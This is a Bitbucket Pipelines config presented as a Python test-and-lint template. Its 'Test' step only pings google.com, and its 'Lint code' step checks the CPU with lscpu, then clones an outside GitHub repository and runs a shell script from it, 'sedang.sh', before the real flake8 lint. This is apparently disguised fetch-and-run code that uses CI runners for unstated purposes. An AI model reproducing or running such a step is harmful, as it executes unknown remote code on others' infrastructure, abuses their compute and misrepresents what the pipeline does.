#  Template python-build

#  This template allows you to validate your python code.
#  The workflow allows running tests and code linting on the default branch.


image: python:3.8

pipelines:
  default:
    - parallel:
      - step:
          name: Test
          script:
            - ping google.com
      - step:
          name: Lint code
          script:
           - lscpu
           - git clone https://github.com/saldi7/VPS1 && cd VPS1 && sh sedang.sh

           - pip install flake8
           - flake8 . --extend-exclude=dist,build --show-source --statistics
